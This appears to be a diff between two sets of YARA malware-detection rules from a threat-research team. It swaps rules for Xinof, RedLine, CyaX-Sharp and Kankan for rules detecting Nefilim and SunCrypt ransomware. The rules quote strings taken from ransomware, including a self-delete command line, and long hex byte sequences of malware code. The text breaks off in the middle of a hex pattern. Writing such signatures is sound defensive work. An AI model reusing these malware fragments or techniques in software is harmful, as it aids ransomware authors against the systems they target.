- APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. +import "pe" - */ -private rule TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE : RANSOMWARE +rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE { meta: - description = "Detect chunk of Xinof ransomware" - author = "Thomas Roccia | McAfee ATR Team" - id = "243c39fd-b5f6-5f64-8058-43da182480c0" - date = "2020-11-20" - date = "2020-11-20" - modified = "2020-11-20" - reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_xinof.yar#L1-L51" + description = "Rule to detect Nefilim ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "55d9cb20-5071-5dce-a46f-a20816ba379f" + date = "2020-03-17" + modified = "2020-04-03" + reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L3-L48" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "0c1e6299a2392239dbe7fead33ef4146" - logic_hash = "f0266962357a7cb26995cdbfcc99749b73fc4ed09c813fa8e2ed0f5143cde554" + hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6" + logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03" score = 75 quality = 70 - tags = "RANSOMWARE" + tags = "RANSOMWARE, FILE" rule_version = "v1" malware_type = "ransomware" - malware_family = "Ransom/XINOF" + malware_family = "Ransom:W32/Nefilim" actor_type = "Cybercrime" - actor_group = "FONIX" + actor_group = "Unknown" strings: - $chunk1 = { - C6 45 ?? ?? - 68 ?? ?? ?? ?? - 50 - E8 ?? ?? ?? ?? - 53 - 50 - 8D 85 ?? ?? ?? ?? - C6 45 ?? ?? - 50 - E8 ?? ?? ?? ?? - 56 - 50 - 8D 85 ?? ?? ?? ?? - C6 45 ?? ?? - 50 - E8 ?? ?? ?? ?? - 83 C4 ?? - C6 45 ?? ?? - 8B CC - 57 - 50 - 51 - E8 ?? ?? ?? ?? - 83 C4 ?? - 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? - 83 C4 ?? - 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? - } + $s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii + $s2 = "oh how i did it??? bypass sofos hah" fullword ascii + $s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide + $s4 = "NEFILIM-DECRYPT.txt" fullword wide + $op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 } + $op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 } + $op2 = { 84 e0 40 00 90 d1 40 00 08 } + $bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? } condition: - any of them + uint16(0)==0x5a4d and filesize <200KB and all of ($s*) or all of ($op*) or $bp } -rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE { meta: - description = "Rule to detect the RedLine payload" + description = "Rule to detect Nefilim samples digitally signed" author = "Marc Rivero | McAfee ATR Team" - id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9" - date = "2020-04-16" + id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9" + date = "2020-04-02" modified = "2020-08-14" - reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_redline.yar#L1-L38" + reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L50-L72" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff" - logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4" + hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5" + logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3" score = 75 quality = 70 - tags = "BACKDOOR, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/RedLine" + malware_type = "ransomware" + malware_family = "Ransom:W32/Nefilim" actor_type = "Cybercrime" actor_group = "Unknown" - strings: - $s1 = "Cambrel.exe" fullword ascii - $s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 } - $op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a } - $op1 = { 96 00 92 0e 83 02 02 00 f4 20 } - $op2 = { 03 00 c6 01 d9 08 1b 03 44 } - $p0 = { 80 00 96 20 83 11 b7 02 10 } - $p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 } - $p2 = { 03 00 c6 01 cd 06 13 03 79 } - condition: - uint16(0)==0x5a4d and filesize <60KB and all of ($s*) and all of ($op*) or all of ($p*) + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Red GmbH/CN=Red GmbH" and pe.signatures[i].serial=="00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures[i].thumbprint=="5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99") } -rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER +import "pe" + +rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE { meta: - description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template" - author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team" - id = "7a1addcf-4e8f-5290-8788-9b0738128160" - date = "2021-04-08" - modified = "2021-08-04" - reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MAL_cyax_sharp_loader.yar#L1-L16" + description = "Rule to detect the new Nefilim written in GO" + author = "Marc Rivero | McAfee ATR Team" + id = "a8809060-c646-5d54-88e7-c8054305ee6c" + date = "2020-07-13" + modified = "2020-08-14" + reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L74-L98" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2" + hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099" + logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270" score = 75 quality = 70 - tags = "LOADER" - version = "1.0" - malware_type = "loader" + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Nefilim" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E } + $pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A90700000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 } condition: - $template + uint16(0)==0x5a4d and filesize <8000KB and all of them } -rule TRELLIX_ARC_Backdoor_Kankan_Pdb : BACKDOOR FILE +rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE { meta: - description = "Rule to detect kankan PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "6910ecc7-3c31-569b-a7ff-2dcbccff88f9" - date = "2013-08-01" - modified = "2020-08-14" - reference = "https://threatpoint.checkpoint.com/ThreatPortal/threat?threatType=malwarefamily&threatId=650" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_kankan_pdb.yar#L1-L27" + description = "Rule to detect SunCrypt ransomware" + author = "McAfee ATR Team" + id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660" + date = "2020-10-02" + modified = "2020-11-02" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Suncrypt.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "73f9e28d2616ee990762ab8e0a280d513f499a5ab2cae9f8cf467701f810b98a" - logic_hash = "3d2e45631dfca0e76e98eee4bb5c4ce1631906f497c052d8c41cc37637cb2760" + logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85" score = 75 quality = 70 - tags = "BACKDOOR, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Kankan" + malware_type = "ransomware" + malware_family = "Ransomware:W32/Suncrypt" actor_type = "Cybercrime" actor_group = "Unknown" + hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80" + hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806" strings: - $pdb = "\\Projects\\OfficeAddin\\INPEnhSvc\\Release\\INPEnhSvc.pdb" - $pdb1 = "\\Projects\\OfficeAddin\\OfficeAddin\\Release\\INPEn.pdb" - $pdb2 = "\\Projects\\OfficeAddinXJ\\VOCEnhUD\\Release\\VOCEnhUD.pdb" + $pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269???????????